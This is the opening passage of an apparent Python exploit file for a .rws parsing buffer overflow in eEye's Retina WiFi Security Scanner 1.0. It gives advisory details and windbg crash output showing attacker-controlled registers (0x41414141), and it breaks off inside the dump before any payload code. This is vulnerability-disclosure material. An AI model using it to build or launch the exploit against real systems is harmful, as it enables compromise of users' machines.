1 #!/usr/bin/python
2 #
3 #
4 # * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability
5 #
6 #
7 # * Summary: Retina WiFi Scanner is a tool to be used to detect IEEE 802.11 (WiFi) based devices.
8 # * Vendor: eEye Digital Security Inc.
9 # * Product Web Page: http://www.eeye.com/
10 # * Current Version: 1.0.8.68
11 # * Notiz: The tool is implemented as part of the eEye’s Retina Network Security Scanner package.
12 # * Tested On Microsoft Windows XP Professional SP3 (English)
13 #
14 # * Vulnerability Discovered By Gjoko ’LiquidWorm’ Krstic
15 # * liquidworm gmail com
16 # * http://www.zeroscience.org
17 # * 16.05.2009
18 #
19 # * Original Advisory: http://www.zeroscience.org/codes/retinawifi_bof.txt
20 # * eEye Advisory: http://research.eeye.com/html/advisories/published/AD20090710.html
21 #
22 #
23 # * −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−windbg−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− *
24 #
25 # (1268.dd8): Access violation − code c0000005 (first chance)
26 # First chance exceptions are reported before any exception handling.
27 # This exception may be expected and handled.
28 # eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0
29 # eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0 nv up ei pl nz na pe nc
30 # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
31 # *** Defaulted to export symbols for [path]\WiFiCore.dll −
32 # WiFiCore!LibWifi_ReportHTML+0x1b48e:
33 # 1001dcce f644300401 test byte ptr [eax+esi+4],1 ds:0023:414141b1=??
34 # 0:000> g
35 # (1268.dd8): Access violation − code c0000005 (first chance)
36 # First chance exceptions are reported before any exception handling.
37 # This exception may be expected and handled.
38 # eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150
39 # eip=7c809eda esp=00121484 ebp=001214b0 iopl=0 nv up ei pl zr na pe nc
40 # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41 # *** Defaulted to export symbols for [pa